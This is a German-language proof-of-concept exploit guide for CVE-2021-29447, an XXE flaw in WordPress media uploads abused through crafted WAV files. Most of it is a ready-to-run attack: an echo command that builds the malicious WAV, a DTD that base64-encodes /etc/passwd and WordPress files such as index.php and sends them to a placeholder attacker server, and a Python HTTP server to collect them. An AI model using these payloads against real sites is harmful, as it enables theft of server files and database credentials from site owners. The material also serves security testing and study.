
Proof-of-Concept-Exploit für CVE-2021-29447, eine WordPress-XXE-Schwachstelle, die die Offenlegung beliebiger Dateien und SSRF über manipulierte WAV-Dateien ermöglicht.
Willkürliche Dateioffenlegung: Der Inhalt jeder Datei im Dateisystem des Hosts konnte abgerufen werden, z. B. wp-config.php, das sensible Daten wie Datenbank-Anmeldedaten enthält. Server-Side Request Forgery (SSRF): HTTP-Anfragen konnten im Namen der WordPress-Installation gestellt werden. Abhängig von der Umgebung kann dies schwerwiegende Auswirkungen haben. Ausnutzung der Schwachstelle
Eine von dieser Schwachstelle betroffene WordPress-Seite wurde im Rahmen des Enumeration-Prozesses mit Hilfe des wpscan-Tools identifiziert.

Es ist sehr einfach, in Ihrer Bash-Konsole
nano poc.wav
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
Erstellen Sie auf Ihrem Angreifer-PC eine DTD mit dem Code, der auf dem Webserver ausgeführt wird.
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
Hinweis: Verwenden Sie zum Lesen von WordPress-Dateien die Syntax "../WP-FILE.php"
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
Starten Sie einen Python-Server im Dateiverzeichnis (python3 -m http.server 8081)